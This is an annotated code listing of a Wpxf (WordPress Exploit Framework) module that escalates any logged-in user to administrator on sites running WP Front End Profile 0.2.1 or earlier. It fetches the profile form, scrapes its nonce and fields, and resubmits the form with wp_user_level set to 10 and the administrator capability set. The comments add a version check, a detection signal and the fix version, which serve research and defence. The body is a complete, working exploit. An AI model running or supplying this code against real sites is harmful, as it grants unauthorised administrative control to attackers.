class Wpxf::Auxiliary::WpFrontEndProfilePrivilegeEscalation

Public Class Methods

Calls superclass method Wpxf::Module::new
# File lib/wpxf/modules/auxiliary/priv_esc/wp_front_end_profile_privilege_escalation.rb, line 6
# Sets up the module: records the metadata the framework displays and
# registers the one option the module depends on.
#
# +super+ runs the base module's initialisation before +update_info+ and
# +register_options+ are called.
#
# +profile_form_path+ has no default and is marked required: per its own
# description it is the path of the page hosting the profile editor form,
# which differs from site to site.
def initialize
  super

  module_info = {
    name: 'WP Front End Profile <= 0.2.1 Privilege Escalation',
    desc: %(
      The WP Front End Profile plugin, in versions <= 0.2.1, allows authenticated
      users of any user level to escalate their user role to an administrator.
    ),
    author: [
      'rastating' # WPXF module
    ],
    references: [
      ['WPVDB', '8620']
    ],
    date: 'Sep 15 2016'
  }
  update_info(**module_info)

  form_path_option = StringOption.new(
    name: 'profile_form_path',
    desc: 'The path to the page containing the profile editor form',
    required: true
  )
  register_options([form_path_option])
end

Public Instance Methods

# File lib/wpxf/modules/auxiliary/priv_esc/wp_front_end_profile_privilege_escalation.rb, line 33
# Fingerprints the installed plugin version from its readme.
#
# The plugin slug is 'wp-front-end' and '0.2.2' is passed as the fixed
# version, so — going by the helper's name — installs below 0.2.2 should be
# reported as vulnerable (confirm against the framework helper). Updating
# the plugin to 0.2.2 or later is therefore the remediation this check
# implies.
#
# @return whatever +check_plugin_version_from_readme+ returns (helper is
#   defined in the framework, not on this page)
def check
  plugin_slug = 'wp-front-end'
  first_fixed_version = '0.2.2'

  check_plugin_version_from_readme(plugin_slug, first_fixed_version)
end
# File lib/wpxf/modules/auxiliary/priv_esc/wp_front_end_profile_privilege_escalation.rb, line 45
# Requests the page that hosts the profile editor form, as the logged-in user.
#
# HTTP redirection following is enabled only for the duration of this one
# request via +scoped_option_change+ — presumably so that a redirect on the
# way to the form page is followed instead of being returned as a 3xx.
# The option is restored afterwards by the helper.
#
# @return the response from +execute_get_request+, or +nil+ if the block
#   never assigned one
def fetch_profile_form
  response = nil

  scoped_option_change('follow_http_redirection', true) do
    request = { url: profile_form_url, cookie: session_cookie }
    response = execute_get_request(**request)
  end

  response
end
# File lib/wpxf/modules/auxiliary/priv_esc/wp_front_end_profile_privilege_escalation.rb, line 55
# Collects the form's current field values so a later submission can be
# replayed with only the role-related fields changed.
#
# Only fields whose name starts with 'wpfep_nonce_name', '_wp_http_referer'
# or 'profile[' are kept; these are the nonce, referer and profile fields the
# form ships with.
#
# Limitations of the regex scrape (no HTML parser is used):
# - the pattern has no +m+ flag, so an +<input>+ tag split across lines is
#   not matched;
# - +name+ must precede +value+ inside the tag, otherwise the value is not
#   captured.
#
# @return [Hash{String => String}, nil] field name => default value; +nil+
#   when the form could not be fetched or did not return HTTP 200 (an empty
#   hash when the page had no matching inputs)
def form_fields_with_default_values
  response = fetch_profile_form
  return nil unless response && response.code == 200

  wanted_prefixes = ['wpfep_nonce_name', '_wp_http_referer', 'profile[']
  input_pattern = /<input.+?name="(.+?)".+?value="(.*?)".*?>/i

  response.body.scan(input_pattern).each_with_object({}) do |(field_name, default_value), fields|
    next unless field_name.start_with?(*wanted_prefixes)

    emit_info "Found field #{field_name}", true
    fields[field_name] = default_value
  end
end
# File lib/wpxf/modules/auxiliary/priv_esc/wp_front_end_profile_privilege_escalation.rb, line 41
# URL of the page configured in the +profile_form_path+ option, formed by
# joining that path onto the target's base URI with +normalize_uri+.
#
# @return the value produced by +normalize_uri+ (a String, presumably —
#   verify against the framework helper)
def profile_form_url
  base_uri = full_uri
  form_path = datastore['profile_form_path']

  normalize_uri(base_uri, form_path)
end
# File lib/wpxf/modules/auxiliary/priv_esc/wp_front_end_profile_privilege_escalation.rb, line 37
# Tells the framework that this module needs a logged-in session before
# +run+ is called.
#
# The weakness is only reachable by an authenticated user (any role, per the
# module description), so no unauthenticated path exists for it.
#
# @return [Boolean] always +true+
def requires_authentication
  true
end
Calls superclass method Wpxf::Module#run
# File lib/wpxf/modules/auxiliary/priv_esc/wp_front_end_profile_privilege_escalation.rb, line 70
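# Executes the module: fetches the profile form's current values, changes the
# role-related fields to administrator, and posts the form back.
#
# Flow, as visible here:
# 1. +super+ does the framework's pre-run work (presumably including the
#    login implied by +requires_authentication+); a false result aborts.
# 2. +form_fields_with_default_values+ yields the nonce, referer and
#    +profile[...]+ fields as the form ships them; +nil+ means the form
#    could not be retrieved, which is reported and aborts the run.
# 3. The three +profile[...]+ fields below are the ones that carry the
#    elevated role in the submission.
#
# From a defender's view the signal is a profile-update POST from a
# low-privileged session carrying +profile[wp_user_level]+ /
# +profile[wp_capabilities][administrator]+; the remediation is the plugin
# version #check treats as fixed (0.2.2 or later).
#
# @return [false, Object] +false+ on either early exit; otherwise the
#   response from +execute_post_request+, returned unchanged — this method
#   does not itself verify whether the escalation took effect.
def run
  return false unless super

  emit_info 'Requesting profile editor form...'
  form_fields = form_fields_with_default_values

  if form_fields.nil?
    emit_error 'Failed to retrieve the profile form'
    return false
  end

  form_fields['profile[wp_user_level]'] = 10
  form_fields['profile[wp_capabilities][administrator]'] = 1
  form_fields['profile[wpfep_save]'] = 'Update Profile'

  emit_info 'Elevating privileges...'
  # Fix: the listing read `cookie: cosession_cookieokie`, an undefined name
  # that would raise NameError before the request was sent. The same
  # +session_cookie+ used by +fetch_profile_form+ is meant here.
  execute_post_request(
    url: profile_form_url,
    cookie: session_cookie,
    body: form_fields
  )
end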